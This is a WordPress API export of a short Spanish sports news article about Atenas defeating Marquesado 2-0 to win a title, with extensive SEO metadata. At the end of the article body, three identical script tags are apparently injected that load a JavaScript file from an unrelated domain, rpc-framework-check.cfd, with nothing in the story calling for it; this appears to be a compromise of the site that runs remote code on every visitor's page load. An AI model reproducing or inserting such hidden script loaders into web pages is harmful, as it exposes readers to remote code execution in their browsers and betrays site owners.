{"id":21977,"date":"2024-12-27T15:28:15","date_gmt":"2024-12-27T18:28:15","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=21977"},"modified":"2026-02-02T19:22:08","modified_gmt":"2026-02-02T22:22:08","slug":"el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/","title":{"rendered":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Con una contundencia propia de una final, Atenas derrot\u00f3 2-0 a Marquesado y sum\u00f3 un nuevo t\u00edtulo a sus vitrinas.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El primer tiempo fue complicado para el conjunto de La Rinconada, que apenas logr\u00f3 acercarse una vez al arco defendido por Olivares, aunque la jugada fue anulada por posici\u00f3n adelantada.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Por su parte, el equipo del oeste mostr\u00f3 mayor claridad en su juego y gener\u00f3 cuatro oportunidades claras de gol que no logr\u00f3 concretar, algo que terminar\u00eda pagando caro en el complemento.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">En la segunda mitad, el Mirasol sali\u00f3 con m\u00e1s intensidad, y con el ingreso de Lucho Argumosa encontr\u00f3 r\u00e1pidamente el camino al gol. De hecho, en su primera intervenci\u00f3n, Argumosa anot\u00f3 para poner en ventaja a Atenas, un golpe dif\u00edcil de asimilar para Marquesado, que no se dio por vencido y continu\u00f3 buscando el empate.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sin embargo, en su af\u00e1n ofensivo, Marquesado dej\u00f3 espacios en defensa, y los veloces atacantes de Atenas aprovecharon la situaci\u00f3n. Fue Pedro Terrero quien sell\u00f3 el 2-0 definitivo con una jugada certera.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Con una contundencia propia de una final, Atenas derrot\u00f3 2-0 a Marquesado y sum\u00f3 un nuevo t\u00edtulo a sus vitrinas. El primer tiempo fue complicado para el conjunto de La Rinconada, que apenas logr\u00f3 acercarse una vez al arco defendido por Olivares, aunque la jugada fue anulada por posici\u00f3n adelantada. Por su parte, el equipo [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":21978,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,178],"tags":[],"class_list":["post-21977","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-futbol","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Con una contundencia propia de una final, Atenas derrot\u00f3 2-0 a Marquesado y sum\u00f3 un nuevo t\u00edtulo a sus vitrinas. El primer tiempo fue complicado para el conjunto de La Rinconada, que apenas logr\u00f3 acercarse una vez al arco defendido por Olivares, aunque la jugada fue anulada por posici\u00f3n adelantada. Por su parte, el equipo [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2024-12-27T18:28:15+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T22:22:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1080\" \/>\n\t<meta property=\"og:image:height\" content=\"810\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas\",\"datePublished\":\"2024-12-27T18:28:15+00:00\",\"dateModified\":\"2026-02-02T22:22:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/\"},\"wordCount\":188,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/471094924_1007010518127943_2500511903928073759_n.jpg\",\"articleSection\":[\"Futbol\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/\",\"name\":\"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/471094924_1007010518127943_2500511903928073759_n.jpg\",\"datePublished\":\"2024-12-27T18:28:15+00:00\",\"dateModified\":\"2026-02-02T22:22:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/471094924_1007010518127943_2500511903928073759_n.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/12\\\/471094924_1007010518127943_2500511903928073759_n.jpg\",\"width\":1080,\"height\":810},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2024\\\/12\\\/27\\\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/","og_locale":"es_ES","og_type":"article","og_title":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes","og_description":"Con una contundencia propia de una final, Atenas derrot\u00f3 2-0 a Marquesado y sum\u00f3 un nuevo t\u00edtulo a sus vitrinas. El primer tiempo fue complicado para el conjunto de La Rinconada, que apenas logr\u00f3 acercarse una vez al arco defendido por Olivares, aunque la jugada fue anulada por posici\u00f3n adelantada. Por su parte, el equipo [&hellip;]","og_url":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2024-12-27T18:28:15+00:00","article_modified_time":"2026-02-02T22:22:08+00:00","og_image":[{"width":1080,"height":810,"url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#article","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas","datePublished":"2024-12-27T18:28:15+00:00","dateModified":"2026-02-02T22:22:08+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/"},"wordCount":188,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg","articleSection":["Futbol","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/","name":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#primaryimage"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg","datePublished":"2024-12-27T18:28:15+00:00","dateModified":"2026-02-02T22:22:08+00:00","breadcrumb":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/12\/471094924_1007010518127943_2500511903928073759_n.jpg","width":1080,"height":810},{"@type":"BreadcrumbList","@id":"https:\/\/www.sanjuandeportes.com\/wp\/2024\/12\/27\/el-mirasol-brilla-atenas-suma-otro-trofeo-a-sus-vitrinas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"El Mirasol brilla: Atenas suma otro trofeo a sus vitrinas"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21977","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=21977"}],"version-history":[{"count":4,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21977\/revisions"}],"predecessor-version":[{"id":29198,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/21977\/revisions\/29198"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/21978"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=21977"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=21977"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=21977"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}